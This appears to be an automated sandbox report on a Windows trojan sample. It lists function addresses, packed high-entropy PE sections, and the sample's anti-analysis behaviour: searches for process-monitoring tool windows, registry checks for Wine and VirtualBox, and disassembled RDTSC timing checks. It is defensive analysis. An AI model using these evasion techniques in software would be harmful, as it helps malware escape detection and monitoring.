    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B02280_2_001B0228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A10000_2_001A1000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B20300_2_001B2030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E40400_2_001E4040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EA0D00_2_001EA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A51600_2_001A5160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002991B40_2_002991B4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AE1A00_2_001AE1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A71F00_2_001A71F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004581AA0_2_004581AA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004581B40_2_004581B4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D82D00_2_001D82D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D12D00_2_001D12D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A12F70_2_001A12F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AA3000_2_001AA300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021138F0_2_0021138F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A13A30_2_001A13A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AB3A00_2_001AB3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D23E00_2_001D23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003604700_2_00360470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CC4700_2_001CC470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B049B0_2_001B049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B44870_2_001B4487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036548E0_2_0036548E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D64F00_2_001D64F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A35B00_2_001A35B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002555970_2_00255597
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BC5F00_2_001BC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DF6200_2_001DF620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E86520_2_001E8652
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A164F0_2_001A164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E86F00_2_001E86F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004537010_2_00453701
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035981F0_2_0035981F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D18600_2_001D1860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DE8A00_2_001DE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB8C00_2_001DB8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035E9430_2_0035E943
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C098B0_2_001C098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003689950_2_00368995
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E89A00_2_001E89A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003679EC0_2_003679EC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E4A400_2_001E4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E8A800_2_001E8A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E7AB00_2_001E7AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00363B170_2_00363B17
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BDB6F0_2_001BDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A7BF00_2_001A7BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E8C020_2_001E8C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00357CBB0_2_00357CBB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E6CBF0_2_001E6CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CCCD00_2_001CCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CFD100_2_001CFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDD290_2_001CDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C8D620_2_001C8D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B4E2A0_2_001B4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CAE570_2_001CAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035CE570_2_0035CE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E8E700_2_001E8E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B6EBF0_2_001B6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001ABEB00_2_001ABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AAF100_2_001AAF10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A8FD00_2_001A8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E7FC00_2_001E7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 001BD300 appears 152 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 001ACAA0 appears 48 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994907693894389
    Source: file.exeStatic PE information: Section: ezfjqhpg ZLIB complexity 0.9938586682930607
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@11/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D8220 CoCreateInstance,0_2_001D8220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: file.exeStatic file information: File size 1823232 > 1048576
    Source: file.exeStatic PE information: Raw size of ezfjqhpg is bigger than: 0x100000 < 0x193800

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ezfjqhpg:EW;piwvgdex:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ezfjqhpg:EW;piwvgdex:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1ca1d8 should be: 0x1bff3c
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: ezfjqhpg
    Source: file.exeStatic PE information: section name: piwvgdex
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DE04C push 771E57FFh; mov dword ptr [esp], edi0_2_003DE082
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044D0DD push 374DD89Ch; mov dword ptr [esp], eax0_2_0044D0EC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C0EC push edi; mov dword ptr [esp], 5D60DC9Dh0_2_0045C651
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160FC push ebp; mov dword ptr [esp], ecx0_2_00416100
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003910E7 push ebp; mov dword ptr [esp], edx0_2_00391109
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039C0DA push 105EC7E8h; mov dword ptr [esp], ebx0_2_0039C131
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039C0DA push eax; mov dword ptr [esp], ecx0_2_0039C189
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003920C9 push 40C8A6A3h; mov dword ptr [esp], esi0_2_003920BE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003920C9 push ebp; mov dword ptr [esp], ecx0_2_003920E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003920C9 push ebx; mov dword ptr [esp], 7DFF2E26h0_2_0039244C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003920C9 push 05527B9Bh; mov dword ptr [esp], ecx0_2_00392462
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046C171 push edx; mov dword ptr [esp], eax0_2_0046C1B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DD17E push edx; mov dword ptr [esp], 7FB7FF61h0_2_003DD1B4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DD17E push eax; mov dword ptr [esp], edx0_2_003DD203
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C102 push 25B8905Eh; mov dword ptr [esp], ebx0_2_0062C121
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C102 push edi; mov dword ptr [esp], edx0_2_0062C187
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D121 push ecx; mov dword ptr [esp], edx0_2_0040D164
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00485139 push ebx; mov dword ptr [esp], edi0_2_0048513D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00485139 push esi; mov dword ptr [esp], 7FFC9929h0_2_00485159
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00485139 push 3EF85FADh; mov dword ptr [esp], ecx0_2_004851D7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004341DA push ecx; mov dword ptr [esp], 5254969Dh0_2_00434204
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002991B4 push edx; mov dword ptr [esp], edi0_2_00299239
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002991B4 push 410F542Ah; mov dword ptr [esp], edx0_2_00299380
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002991B4 push edx; mov dword ptr [esp], 5DFFCCBCh0_2_002993A1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C1B3 push esi; mov dword ptr [esp], edi0_2_0062C1B4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C1B3 push edx; mov dword ptr [esp], 7F7F8412h0_2_0062C1D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C1B3 push edi; mov dword ptr [esp], ecx0_2_0062C1EC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C1B3 push 1ADF79B3h; mov dword ptr [esp], edx0_2_0062C2C4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004161AF push edx; mov dword ptr [esp], ecx0_2_004161B9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004161AF push 7CDCD179h; mov dword ptr [esp], ebp0_2_004161FE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004581AA push edx; mov dword ptr [esp], ebx0_2_0045849D
    Source: file.exeStatic PE information: section name: entropy: 7.978710446995474
    Source: file.exeStatic PE information: section name: ezfjqhpg entropy: 7.953552456980984

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E423 second address: 36E42F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F2FF4BC0FB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E6DF second address: 36E6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E6E5 second address: 36E70D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2FF4BC0FC3h 0x00000008 jbe 00007F2FF4BC0FB6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F2FF4BC0FCBh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371FDF second address: 371FE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371FE6 second address: 372049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov si, 29CEh 0x0000000c push 00000000h 0x0000000e sub dword ptr [ebp+122D2EC4h], edi 0x00000014 push eax 0x00000015 mov edi, dword ptr [ebp+122D1AD4h] 0x0000001b pop edi 0x0000001c call 00007F2FF4BC0FB9h 0x00000021 jne 00007F2FF4BC0FCDh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jp 00007F2FF4BC0FCEh 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372049 second address: 372095 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2FF4F875F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F2FF4F875FFh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F2FF4F87609h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F2FF4F875FCh 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372095 second address: 37214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2FF4BC0FBAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e jbe 00007F2FF4BC0FBCh 0x00000014 mov dword ptr [ebp+122D1C09h], ebx 0x0000001a push 00000003h 0x0000001c pushad 0x0000001d mov eax, ecx 0x0000001f jne 00007F2FF4BC0FC4h 0x00000025 popad 0x00000026 push 00000000h 0x00000028 mov edx, 677C65A1h 0x0000002d push 00000003h 0x0000002f mov dword ptr [ebp+122D2EC4h], edi 0x00000035 xor edx, 1A1C6ED0h 0x0000003b push 78B8D70Eh 0x00000040 jmp 00007F2FF4BC0FC1h 0x00000045 add dword ptr [esp], 474728F2h 0x0000004c mov di, 6EE6h 0x00000050 lea ebx, dword ptr [ebp+12441E4Bh] 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F2FF4BC0FB8h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 0000001Bh 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 push edi 0x00000071 mov edi, dword ptr [ebp+122D3754h] 0x00000077 pop esi 0x00000078 xchg eax, ebx 0x00000079 pushad 0x0000007a push edi 0x0000007b jmp 00007F2FF4BC0FC1h 0x00000080 pop edi 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37214E second address: 372152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372152 second address: 372156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372156 second address: 372170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F2FF4F875FAh 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3721A1 second address: 3721A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372296 second address: 3722A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3723F3 second address: 372440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F2FF4BC0FC3h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F2FF4BC0FC6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372440 second address: 372470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2FF4F875FFh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2FF4F87606h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372470 second address: 37249B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F2FF4BC0FB8h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37249B second address: 3724B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F2FF4F875F6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3724B6 second address: 372510 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b cld 0x0000000c lea ebx, dword ptr [ebp+12441E5Fh] 0x00000012 jmp 00007F2FF4BC0FBDh 0x00000017 mov edx, dword ptr [ebp+122D397Ch] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F2FF4BC0FBCh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F2FF4BC0FC5h 0x0000002c jnp 00007F2FF4BC0FB6h 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372510 second address: 372516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372516 second address: 37251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3918DB second address: 3918F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2FF4F875F6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2FF4F875FEh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3918F8 second address: 39190A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39190A second address: 391910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391910 second address: 391914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391914 second address: 39191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39191A second address: 391924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391924 second address: 39192A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39192A second address: 39192E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39192E second address: 391932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391932 second address: 391938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35E437 second address: 35E448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38FFC2 second address: 38FFE0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2FF4BC0FB6h 0x00000008 jmp 00007F2FF4BC0FC4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38FFE0 second address: 38FFEA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2FF4F875FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39016B second address: 39017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F2FF4BC0FBAh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39045D second address: 390496 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2FF4F875FBh 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F2FF4F87607h 0x0000001a jng 00007F2FF4F875F6h 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3905ED second address: 3905F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3905F1 second address: 39060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F875FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2FF4F875F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39060E second address: 390612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390612 second address: 390632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2FF4F87608h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366A0B second address: 366A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366A11 second address: 366A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366A15 second address: 366A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
